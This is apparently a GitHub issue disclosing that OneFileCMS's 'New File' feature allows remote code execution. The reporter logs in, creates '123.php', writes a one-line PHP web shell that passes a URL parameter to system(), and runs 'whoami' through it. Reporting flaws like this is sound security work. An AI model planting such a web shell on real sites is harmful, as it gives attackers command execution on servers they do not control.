Skip to content

The " New FIle " button cause getshell #7

@havysec

Description

@havysec

http://fragrant:30001/OneFileCMS/onefilecms.php
use username and password login the page
type New filename '123.php' click Create

image

123.php created successfully.
image

click 123.php write below

<?php system($_GET['cmd']);?>

click save

image

123.php saved successfully.

fragrant:30001/OneFileCMS/123.php?cmd=whoami

image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions